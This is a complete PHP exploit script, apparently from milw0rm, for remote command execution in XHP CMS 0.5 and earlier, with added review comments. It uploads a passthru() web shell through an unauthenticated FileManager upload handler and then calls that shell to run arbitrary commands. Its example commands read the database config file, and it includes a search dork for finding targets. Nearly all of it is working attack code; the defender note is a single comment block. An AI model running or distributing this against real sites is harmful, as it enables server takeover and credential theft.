  1. #!/usr/bin/php -q -d short_open_tag=on
  2. <?
  3.  
// Banner printed on every run, including a run that only shows usage.
echo "XHP CMS <= 0.5 remote cmmnds xctn\r\n";
echo "by rgod [email protected]\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";

echo "dork: \"powered by XHP CMS\"\r\n\r\n";

// Usage is printed when fewer than three positional arguments are given,
// but nothing stops execution here: with no `die`, the script falls through
// and later reads $argv[1]..$argv[3], which are then undefined offsets.
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to XHP\r\n";
echo "cmd:       a shell command\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /xhp/ cat ./../dbconfig.php\r\n";
echo "php ".$argv[0]." localhost /xhp/ ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
}
  23.  
/* explanation:
 without having admin rights, you can access the FileManager plugin
 to upload php files:
  27.  
  28.  http://[target]/[path_to_xhp]/inc/htmlarea/plugins/FileManager/manager.php
  29.  
  30.  or
  31.  
  32.  http://[target]/[path_to_xhp]/inc/htmlarea/plugins/FileManager/standalonemanager.php
  33.  
  34.  after, you can launch commands from them, ex:
  35.  
  36.  http://[target]/[path]/filemanager/suntzu.php?cmd=cat%20./../dbconfig.php
  37.  
  38.                                                                               */
// No script time limit; the socket streams opened later (fsockopen and the
// fgets/fread loops in sendpacketii) give up after 5 seconds of inactivity.
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
  41.  
  42. function quick_dump($string)
  43. {
  44.   $result='';$exa='';$cont=0;
  45.   for ($i=0; $i<=strlen($string)-1; $i++)
  46.   {
  47.    if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
  48.    {$result.="  .";}
  49.    else
  50.    {$result.="  ".$string[$i];}
  51.    if (strlen(dechex(ord($string[$i])))==2)
  52.    {$exa.=" ".dechex(ord($string[$i]));}
  53.    else
  54.    {$exa.=" 0".dechex(ord($string[$i]));}
  55.    $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  56.   }
  57.  return $exa."\r\n".$result;
  58. }
// Pattern for the -P option: dotted-quad IPv4 address, ':' and a 1-5 digit
// port. The outer parentheses are the PCRE delimiter pair, not a capturing
// group. Digits only, so a proxy given by hostname is rejected as invalid.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
/**
 * Send one raw HTTP request over a plain TCP socket and store the full
 * response in the global $html.
 *
 * Reads the globals $host, $port, $proxy and $proxy_regex. With an empty
 * $proxy the connection goes to gethostbyname($host):$port; otherwise $proxy
 * must match $proxy_regex (ip:port) and the request is written to the proxy.
 * Every connection or validation failure prints a message and calls die, so
 * the function does not return to the caller on error.
 *
 * NOTE(review): eregi() belongs to the ereg extension, which was removed in
 * PHP 7.0, so the proxy branch only runs on PHP 5 and older. Nothing other
 * than the default_socket_timeout ini value bounds the read loops.
 *
 * @param string $packet complete request: request line, headers, blank line, body
 * @return void the response text is left in the global $html
 */
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
        // preg_match takes the pattern's parentheses as its delimiter pair.
        $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
        }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    // Direct connection: read line by line until the server closes the
    // socket, which the callers request via "Connection: close".
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    // Via proxy: read one byte at a time and keep going while either EOF
    // has not been reached OR no CRLFCRLF header terminator has been seen.
    // If the proxy closes the socket without ever sending CRLFCRLF, the
    // second condition stays true and this loop does not terminate.
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
 #echo "\r\n".$html;
}
  98.  
  99. function make_seed()
  100. {
  101.    list($usec, $sec) = explode(' ', microtime());
  102.    return (float) $sec + ((float) $usec * 100000);
  103. }
  104.  
// ---- argument handling ----------------------------------------------------
$host=$argv[1];
$path=$argv[2];
$action=$argv[3];   // NOTE(review): assigned here but never read again below
$cmd="";$port=80;$proxy="";

// Every argument from the third onward is either an option (-p / -P) or a
// word of the command string. Only the first two characters are inspected,
// so a one-character argument makes $argv[$i][1] an undefined offset.
// `<>` is PHP's alternate spelling of `!=` (loose comparison).
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
$cmd=urlencode($cmd);

// The path must start and end with '/'. Through a proxy the request line
// carries the absolute URL instead of the bare path.
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}


// rand() only varies the uploaded filename between runs; this is not a
// security-relevant use of randomness.
srand(make_seed());
$anumber = rand(1,99999);

// ---- step 1: file upload --------------------------------------------------
// Multipart body for the FileManager upload handler. The uploaded file,
// suntzu<anumber>.php, passes its `cmd` GET parameter to passthru() between
// two "*delim*" markers, i.e. it is a web shell.
// For defenders: the upload goes to inc/htmlarea/plugins/FileManager/images.php
// and the file lands under filemanager/. A POST to that handler carrying a
// .php filename in the multipart body, or a new PHP file appearing under
// filemanager/, is the event to alert on; the handler should require
// authentication and refuse executable extensions.
   echo "[1] Uploading a shell...\r\n";
$data='-----------------------------7d61592213049c
Content-Disposition: form-data; name="dir"

/
-----------------------------7d61592213049c
Content-Disposition: form-data; name="upload"; filename="suntzu'.$anumber.'.php"
Content-Type: text/plain

<?php
if (get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);}
ini_set("max_execution_time",0);
echo "*delim*";
passthru($_GET[cmd]);
echo "*delim*";
?>
-----------------------------7d61592213049c
Content-Disposition: form-data; name="submit"

Upload
-----------------------------7d61592213049c--
';
  // Plain HTTP/1.0 with "Connection: close": sendpacketii's direct-connection
  // read loop relies on the server closing the socket.
  $packet="POST ".$p."inc/htmlarea/plugins/FileManager/images.php HTTP/1.0\r\n";
  $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61592213049c\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.="Connection: close\r\n\r\n";
  $packet.=$data;
  #echo quick_dump($packet);
 sendpacketii($packet);
  // presumably a pause to let the upload settle before the file is requested
  sleep(1);
// ---- step 2: request the uploaded file -----------------------------------
// The command travels in the query string; the "*delim*" markers printed by
// the uploaded file bracket the passthru() output.
  echo "[2] Launch commands...\r\n";
  $packet="GET ".$p."filemanager/suntzu".$anumber.".php?cmd=".$cmd." HTTP/1.0\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Connection: Close\r\n\r\n";
  #echo quick_dump($packet);
 sendpacketii($packet);
  // Success is judged solely by the presence of the marker in the response;
  // $temp[1] is whatever sits between the first two markers.
  if (strstr($html,"*delim*"))
  {
  echo "Exploit succeeded...\r\n\r\n";
  $temp=explode("*delim*",$html);
  echo $temp[1];
  }
  else
  {echo "Exploit failed...\r\n";}
  177. ?>
  178.  
  179. # milw0rm.com
